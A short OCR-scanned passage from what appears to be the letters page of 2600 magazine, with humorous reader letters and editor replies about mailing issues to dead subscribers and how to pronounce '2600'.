existence must be exposed and condemned or we 're 
not really accomplishing anything. 

Dear 2600: 
How do you know when the subscribers die? You 

could waste money sending copies of your magazines 
to dead people. 

grant weIch 
Great. Something else to worry about. 

Dear 2600: 
How do you say "2600"'1 a) "two thousand six 

hundred", b) "twenty-six hundred", c) "two six zero 
zero", d) something else? Please write back soon, we 
have a bet on this .  

Mikko 
Would you believe it 's never come up ? Being mag­

azine people, we don 't have to actually speak out loud. 

Dear 2600: